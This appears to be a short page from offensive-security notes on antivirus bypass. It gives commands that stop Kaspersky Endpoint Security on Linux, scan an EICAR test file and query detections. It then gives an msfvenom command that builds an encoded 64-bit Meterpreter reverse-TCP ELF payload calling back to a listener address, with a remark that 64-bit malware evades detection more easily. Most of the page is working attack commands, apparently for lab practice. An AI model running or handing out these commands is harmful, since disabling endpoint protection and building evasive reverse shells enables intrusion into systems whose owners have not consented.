AV Bypass
Disable Kaspersky for testing files.
sudo kesl-control --stop-t 1
Scan a file Warning this will probably delete your file so have backups
sudo kesl-control --scan-file ./eicar.txt
View Detections
sudo kesl-control -E --query | grep DetectName
64 bit malware is less likely to be detected.
msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.119.120 -e x64/zutto_dekiru -f elf -o /tmp/met64zutto_dekiru.elf
Last updated
Was this helpful?